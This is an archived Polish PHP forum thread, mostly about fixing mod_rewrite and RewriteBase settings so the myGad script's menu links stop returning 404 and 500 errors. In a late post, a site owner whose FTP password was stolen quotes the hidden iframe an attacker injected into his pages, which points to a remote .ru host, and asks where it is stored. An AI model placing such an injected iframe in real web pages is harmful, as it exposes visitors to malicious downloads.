Pomoc - Szukaj - Użytkownicy - Kalendarz
Pełna wersja: myGad 2.0 [404] File Not Found : Plik nie istnieje
Forum PHP.pl > Forum > Gotowe rozwiązania > Systemy portalowe i CMS'y
andegrand2
Witam!

Mam problem ze świeżo kupionym skryptem myGad zainstalowałem go na serwerze pod adresem opisowo.net i nie działają wogle linki w menu sad.gif Panel Admina itp jest ok a to nie dziala..

Prosze o pomoc pozdrawiam
sniezny_wilk
hmm.. ja otrzymuje błąd 500 u Ciebie, może coś z .htaccess ?
andegrand2
błąd 500 dlatego ze dlubalem w .htaccess ale teraz juz wlaczysz go normlanie i nedzie 404 sad.gif nie wiem co jest...

Edit:

oto moje .htaccess

1. <?php
  2. RewriteEngine On
  3. RewriteBase /~patryk/mygad_v20/
  4.  
  5. # w drugim czonie dodaem specjalnie kilka znak� - niektorzy uzytkownicy podaja
  6. # udziwnione nicki - trzeba to przewidziec ;)
  7.  
  8. RewriteRule ^opisy,([a-zA-Z0-9-]+),([a-zA-Z0-9!@#$%^&*()_+-=`~./?;:'"{}]+),([0-9a-z]+),(1+),([a-z]+),([A-Z]+),([0-9]+).html index.php?mode=$1&id=$2&s=$3&sort=$4&sort_by=$5&order_by=$6&perpage=$7 [L]
  9.  
  10. RewriteRule ^opisy,([a-zA-Z0-9-]+),([a-zA-Z0-9!@#$%^&*()_+-=`~./?;:'"{}]+),([0-9a-z]+).html index.php?mode=$1&id=$2&s=$3 [L]
  11.  
  12. RewriteRule ^opisy,([a-zA-Z0-9-]+),([a-zA-Z0-9!@#$%^&*()_+-=`~./?;:'"{}]+).html index.php?mode=$1&id=$2 [L]
  13.  
  14. RewriteRule ^opisy,([a-zA-Z0-9_]+).html index.php?mode=$1 [L]
  15.  
  16. RewriteRule ^index.html$ index.php
  17. ?>

coś jest w info ze musze zamienic plik RewriseRules na .htaccess można coś więcej o tym questionmark.gif smile.gif
sniezny_wilk
Mi się wydaje, że to może być coś z tym

1. <?php
  2. RewriteBase /~patryk/mygad_v20/
  3. ?>

to jest oznaczenie, dla jakiego katalogu mod_rewrite ma działać jesteś pewien, że wybrałeś właściwy ? może powinno być

1. <?php
  2. RewriteBase /
  3. ?>

lub

1. <?php
  2. RewriteBase ./
  3. ?>

?

W jaką masz strukturę katalogów ? W jakim folderze jest MyGad ?
andegrand2
skrypt mam w pc-gielda.nazwa.pl/opisy więc zrobiłem tak

1. <?php
  2. RewriteBase /opisy/
  3. ?>

i wywala blad 500 ;/
sniezny_wilk
A odpal z:

1. <?php
  2. RewriteBase ./opisy/
  3. ?>

i spróbuj usunąć wpis RewriteBase, może nie jest potrzebny.
andegrand2
[500] Internal Server Error : Wewnętrzny błąd serwera

heh nadal to samo sad.gif
sniezny_wilk
Ale przez chwilkę działało, bo widziałem, że ładnie pokazała się strona główna. Co wtedy zrobiłeś, ani z kropką ani usunięcie nie działa ?
andegrand2
owszem działa strona głowna bo wstawiam nie zmieninony plik .htaccess ale nie działają linki w menu ;/ zobacz sobie teraz o co mi chodzi bo dziala strona glowna i panel admina nic pozatym:)
sniezny_wilk
A jak wygląda niezmieniony .htaccess ?
andegrand2
tak jak ten co wstawiłem na gorze 2 posty wyzej smile.gif ale chodzi o to ze jak np. klikam szukaj opisy w menu to wywala
[404] File Not Found : Plik nie istnieje

bo gdzies w kodzie nie ma odniesienia tej lokalizacji http://opisowo.net/opisy,search.html do danego pliku przypuszczam ze jest to wina .htaccess ale nie wiem w ktorym miejscu bo juz probuje wszystkiego sad.gif
sniezny_wilk
Próbowaliśmy już RewriteBase ./opisy/ i RewriteBase /opisy/

jedyne co mi przychodzi do głowy to:

1. <?php
  2. RewriteBase ./opisy
  3. ?>

lub

1. <?php
  2. RewriteBase /opisy
  3. ?>

EDIT: Czyli masz główny katalog a w nim zaraz katalog opisy tak ? i żadnych katalogów więcej ?
andegrand2
probowalem i tego i tego ...

mam katalog glowny a w nim ze 20 folderow w tym /opisy...

w info jest takie cos:

UWAGA!

1. Wersje 1.5 oraz 2.0 różnią się jedynie tym, że ta druga obsługuje moduł serwera Apache mod_rewrite. Po pomyślnej instalacji v2.0 należy jeszcze zmienić nazwę pliku `RewriteRules` na `.htaccess`. Gdyby użytkownik zainstalował w jakimś podkatalogu katalogu głównego np. http://domena.pl/mygad/ konieczna jest modyfikacja lini pliku .htaccess:

RewriteBase /

na

RewriteBase /mygad

wie ktos jak to zrobic z ta zamiana questionmark.gif
sniezny_wilk
a masz tam plik `RewriteRules` ? Przecież masz wersję 1.5 a nie 2.0 skoro 2.0 obsługuje mod_rewrite, a 1.5 nie, to może spróbuj usunąć po prostu tego .htaccess ?

EDIT: chociaż nie wiem co masz.. W tytule strony masz wersje 1.5 a w stopce 2.0.

EDIT2: Raczej musisz mieć mod_rewrite, bo na to wskazują linki. A skąd masz te myGad, może nie dostałeś wszystkich plików skoro oryginalnie był zapis RewriteBase /~patryk/mygad_v20/ zapewne dostałeś zrzut z serwera.. Może zapytaj się tego kto sprzedał Tobie skrypt.
andegrand2
mam wersje 2.0 i ogsługą tego pliku i jest on na serwie sprobuje jeszcze zainstalowac skrypt na innym serwerze i napisze jaki efekt smile.gif

pozdrawiam
sagittariuspl
po pierwsze jeżeli htaccess masz w katalogu /opisy to zmień w tym pliku rewritebase na
  1. <?php
  2. RewriteBase /
  3. ?>
ma być sam znak '/' nie '/opisy'. wtedy powiedz jak to chodzi. pewnie to co dodałeś jest błędne - tyle znaków nawstawiałeś, ze aż strach
sniezny_wilk
Cytat(sagittariuspl @ 31.12.2007, 17:54:42 ) *
po pierwsze jeżeli htaccess masz w katalogu /opisy to zmień w tym pliku rewritebase na
  1. <?php
  2. RewriteBase /
  3. ?>
ma być sam znak '/' nie '/opisy'. wtedy powiedz jak to chodzi. pewnie to co dodałeś jest błędne - tyle znaków nawstawiałeś, ze aż strach

Cytat(sniezny_wilk)
pewien, że wybrałeś właściwy ? może powinno być

1. <?php
  2. RewriteBase /
  3. ?>

lub

1. <?php
  2. RewriteBase ./
  3. ?>

?

Już podałem takie rozwiązanie.

EDIT: i to nie on nastawiał tyle znaków tylko autor systemu MyGad. A to co przedstawił autor tematu to jest dokładnie to (no może bez jednej linijki tej gdzie jest RewriteBase) co posiada każdy plik .htaccess w MyGad 2.0. Zapewne te "ponastawiane znaki" są dobrze, a problem jest albo z serwerem, albo z tym RewriteBase, albo autor tematu coś źle coś napisał, lub nie zainstalował wszystkich plików.

PS: @sagittariuspl proszę czytaj temat zanim napiszesz smile.gif
andegrand2
heh no nic ja jeszcze coś pokombinuje ale i tak dzięki za pomoc

i pozdrowiam

Edit: hehe udało się smile.gif bardzo banalna usterka ze tak powiem wina lezala po stronie pliku .htaccess.

Mam tylko 2 problem zaimportowalem sobie baze opisow (8 tys) i nie czyta ona polskich znakow sad.gif wiek ktos czemu questionmark.gif
krzychurr
witam mam problem z mygad poprostu nawet nie moge zainstalowac skryptu gdyz wyskakuje mi błąd:

Cytat
Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.

Please contact the server administrator, webmaster@opisy-ggpl.alegropl.i8p.eu and inform them of the time the error occurred, and anything you might have done that may have caused the error.

More information about this error may be available in the server error log.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

ktoś kto instalował skrypt pewnie powienien wiedziec o co chodzi bardzo prosilbym o pomoc potrzebuje go zainstalowac a niebardzo sie znam na php zmienilem cos w plieku .htaccess ale nadal nic i przed zmienan tez nic sie nie działo

jesli ktos moze i ma czas pomoc mi to bardzo byłbym wdzieczny prosze napiszcie tutaj lub na moje gg 5615650(niewidoczny)

dziekuje bardzo
andegrand2
Uwaga!

Wiem że stara data i.t.p. ale co chwile dostaje PW o tyle mygad więc postanowiłem napisać co i jak bo nie zawsze mam kiedy odpisywać na wasze wiadomości smile.gif

1.Otwórz w notatniku plik RewriteRules.
2. Znajdz wyrażenie RewriteBase i podaj mu ścieżkę do swojego skryptu. Jeżeli masz ją poprostu na serwerze bez żadnych pod katalogów zostaw tak
Kod
RewriteBase /#

Natomiast jeżeli masz np. twojanazwa.nazwa.pl/opisy to zrób tak:

Kod
RewriteBase /opisy/#

3.Wżuć ten plik na serwer do katalogu ze skryptem.
4.Zmień nazwe RewriteRules na .htaccess z poziomu klienta FTP exclamation.gif !
5.Ciesz się działającym skryptem mygad biggrin.gif

Mam nadzieję żę pomogłem.

Pozdrawiam,
lukaszz
Posiadam stronę z opisami opartą na skrypcie myGaD.
Niestety wirus wykradł mi hasło z Total Commandera i wstawił u góry na stronie niewidoczną ramkę, która obniżyła stronę w dół.
  1. <iframe src="http://a5j.ru:8080/ts/in.cgi?pepsi101" width=125 height=125 style="visibility: hidden"></iframe>

Chciałem to usunąć, ale nie wiem gdzie jest ten element. Sprawdziłem w kilku miejscach m.in. 'index.php' oraz '.../templates/nazwa_szablonu/index.tpl' ale tego tam nie ma.
Ma ktoś jakieś pomysły, gdzie można to znaleźć ?

----------------------------------------------------------------------
Edit (28.07.2009):

Jak do tej pory nie znalazłem jeszcze przyczyny pojawienia się ramki.

Podmieniłem cache na serwerze oraz wszystkie pliki z nazwą index.

Pewnie ten kod siedzi gdzieś w jakiejś tabeli:
  1. mygad_categories
  2. mygad_comments
  3. mygad_config
  4. mygad_descs
  5. mygad_descs_other
  6. mygad_emails
  7. mygad_links
  8. mygad_news
  9. mygad_tmp

Wiecie może gdzie tego szukać ?

W Mozilli moja strona została już zablokowana: "Witryna zgłoszona jako dokonująca ataków!"
doman_1
Witam,

Znacie może skrypt na, którym można postawić stronkę z opisami GG, czytałem trochę o myGAD jednak nie wiem na jakiej jest licencji, a na serwisie aukcyjnym już nikt nie sprzedaje tego skryptu.
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.
Invision Power Board © 2001-2025 Invision Power Services, Inc.